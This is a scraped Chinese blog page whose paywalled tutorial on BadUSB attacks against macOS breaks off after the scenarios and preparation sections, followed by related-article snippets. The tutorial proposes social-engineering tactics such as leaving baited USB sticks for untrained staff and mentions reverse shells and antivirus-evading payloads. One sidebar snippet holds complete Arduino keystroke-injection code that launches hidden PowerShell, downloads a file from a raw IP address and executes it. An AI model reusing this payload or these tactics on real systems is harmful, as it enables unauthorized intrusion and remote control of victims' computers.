Badusb 攻击之MacOSX系统实战

最新推荐文章于 2024-09-14 23:40:40 发布
最新推荐文章于 2024-09-14 23:40:40 发布
阅读量787 收藏 3
点赞数
文章标签: usb shell 安全漏洞 企业安全 物联网
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/insightglacier/article/details/105382590
版权
本文详细介绍了Badusb攻击在MacOSX系统中的实施过程,包括利用场景、准备工作、基础知识、实战攻击和防御策略。通过使用Arduino Leonardo制作键盘注入工具,演示了如何编写和上传攻击代码以执行反弹shell。同时,文章还提到了防御措施,如Google的ukip项目和Windows Defender。请勿用于非法目的。
摘要由CSDN通过智能技术生成

Badusb 已经出现了很多年,使用usb进行攻击的手段也从最初的利用autorun.inf、伪造文件夹名、快捷方式等手段转为更加难以防御的Badusb。这种攻击方式就是目前可绕过杀毒软件,防御较难。

点此打开观看一段演示视频,需fq。

利用场景

说下本文中利用场景:

  1. 混入企业内部,员工电脑未锁屏的情况下。在之前去过很多客户那里,大多数企业的员工离开电脑前不锁屏的情况,而且非常严重。
  2. 对于无安全意识的员工进行攻击,如公司文员、前台、行政等,例如将usb贴上保密、照片等字样,并扔到显眼位置,以吸引人来捡并插入其电脑。

针对Badusb攻击手段还有很多,利用场景也还有,这里仅列出与本文有关的部分。下面就让我们正式开始进入制作。

准备工作

硬件

  • Arduino Leonardo 淘宝上直接搜索Badusb,有很多卖的,价格都比较便宜。

软件

  • Arduino IDE 官网下载地址:https://www.arduino.cc/en/Main/Software
  • 免杀木马,我这里macos下直接用的反弹shell,windows下使用的是免杀的meterpreter,payload为reverse_tcp。由于免杀不是本文重点,请自行制作。
    • <
最低0.47元/天 解锁文章
insightglacier
关注
疯狂的极客--初识BadUSB
Peter_FHC的博客
05-27 2778
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
badusb代码_badusb攻击代码
weixin_39887183的博客
11-28 2506
badusb攻击(msfconsole)准备badusbArduino下载软件点击下载运行软件在工具菜单中 选择,选择badusb的端口和开发版。注入代码windows10系统#includevoidsetup(){Keyboard.begin();//开始键盘通讯delay(1000);//延时Keyboard.press(KEY_LEFT_GUI);//win键delay(50...
基于ArduinoLeonardo板子的BadUSB攻击实战
weixin_34376562的博客
04-11 615
0X00 前言 在Freebuf上许多同学已经对HID攻击谈了自己的看法,如维克斯同学的《利用Arduino快速制作Teensy BadUSB》无论从科普还是实践都给我们详尽的描述了BadUSB制作的相关过程,lpcdma同学的《使用arduino进行渗透测试》则通过SET与Arduino的结合进行渗透,mrzcpo同学的 《HID高级攻击姿势:利用PowerShell脚本进行文件窃取》则介绍了获...
【近源攻击badusb制作
最新发布
qinjilll的博客
09-14 1276
BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。HID(Human InterfaceDevice)设备通常指的就是键盘鼠标等与人交互的设备,用户插入BadUSB,就会自动执行预置在固件中的恶意代码。BadUsb插入后,会模拟键盘鼠标对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载其他代码并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。
BadUSB攻击
qq_45391176的博客
09-08 2447
一文读懂Bad USB
什么是BadUSB攻击以及如何预防
ITmoster的博客
12-09 4372
BadUSB 是带有嵌入式固件的闪存驱动器,可用于重新编程设备并允许它充当人机界面小工具,例如键盘、鼠标或耳机。它们用于通过有效地伪装成人机接口设备 (HID) 在计算机上执行各种操作。换句话说,BadUSB是虚拟键盘,可以预先编程以在计算机上键入字符,而无需物理操作。一旦插入,他们就可以直接开始工作,甚至执行需要同时使用两个或多个键的复杂击键。
VMware安装MacOSx系统-附件资源
03-05
VMware安装MacOSx系统-附件资源
PL2303_MacOSX usb转串口驱动
06-07
标题中的“PL2303_MacOSX usb转串口驱动”指的是为MacOSX系统设计的一个USB到串行接口转换器的驱动程序。PL2303是一款常见的USB到UART(通用异步接收发送器)桥接芯片,由Prolific Technology公司制造,广泛用于各种...
MacOSX系统入门指南8.28更新部分.pdf
10-11
根据所提供的文件信息,我们可以提炼出一些与MacOSX系统相关的知识点。由于提供的内容有限,并且包含了OCR扫描误差,我们将以文件标题、描述以及部分内容中所透露的信息为基础,进行详细的知识点阐述。 首先,文件...
java办公用品管理系统源码-x11vnc-macosx:x11vnc-macosx
06-05
【标题】"java办公用品管理系统源码-x11vnc-macosx:x11vnc-macosx" 提供的是一个基于Java编程语言开发的办公用品管理系统源代码,结合了x11vnc-macosx的元素。x11vnc是一种在Mac OS X操作系统上运行的VNC(虚拟网络...
黑客利用网闸穿透原理攻击MacOS计算机
w3cschools的博客
04-28 727
近日,为了进一步证明这一点,苹果公司发布了macOS操作系统更新,以解决被主动利用的零日漏洞,该漏洞可能绕过所有安全保护措施,从而允许未经批准的软件在Mac上运行。 安全工程师Cedric Owens于2021年3月25日发现了macOS漏洞,并将其标识为CVE-2021-30657。 国际知名白帽黑客、东方联盟创始人郭盛华透露:“即使在完全修补的M1 macOS系统上,未经签名,未经公证的基于脚本的概念证明应用程序也可以轻松可靠地避开所有macOS的所有相关安全机制(文件隔离,关守和公证要求)。“ 具
stm32 badusb
11-01
stm32f103C8T6制作的badUSB,晶振用的12M 如果是8M晶振需改回来。
badusb_badusb_
09-29
badusb资料,需要自行打包带走
badusb代码.zip
07-25
分享一款badusb的代码,测试过还是可以正常使用。希望帮到有需要的小伙伴。
BADUSB代码及服务器地址.txt
07-21
BADUSB代码及服务器地址,主要用于arduino配置及BADUSB制作
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
利用Arduino快速制作Teensy BadUSB攻击计算机
weixin_33929309的博客
08-23 701
  BadUsb介绍   BadUSB是计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在2014年的BlackHat安全大会上公布。 虽然已隔一两年,但还是有人在研究它,它的攻击方式也多种多样。   使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶意代码,下载服务器上恶意文件,执行恶意操作——注意,这里的U盘自动运行可...
badusb代码_BadUSB联动Msf
weixin_39906358的博客
11-28 633
最近对BadUSB比较感兴趣,所以就买了两块开发板玩玩。一个是Digispark,一个是Leonardo,某宝上都有卖,十块二十块左右,容易上手,作为初学工具还是比较合适的。它们分别长这个样子: Digispark开发板...
BadUSB制作教程
weixin_40485904的博客
02-04 1906
BadUSB制作教程BadUSB的优点制作BadUSB的几种板子那么来做一个BadUSB怎么样? 和大多数人一样,最初见到BadUSB是在美剧《黑客军团》中,是fsociety组织常用的工具之一,无论是向服务器下载木马控制被害者主机,还是达琳在停车场帅气的扔出大量USB钓鱼,BadUSB都是功不可没的物理武器之一。 剧情中使用Hak5的USB rubber ducky控制目标主机 达琳在停车场扔BadUSB钓鱼 BadUSB的优点 在USB攻击领域,很多年前常用的是老式USB病毒autorun.inf,
MacOSX系统详解:从桌面到菜单栏
"这是一份针对苹果系统的自学教程,特别关注Mac OS X的操作界面和常用功能。教程通过图文并茂的方式,帮助用户轻松掌握Mac电脑的使用。" 在Mac OS X系统中,桌面是用户与系统交互的主要界面,它由多个核心元素组成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值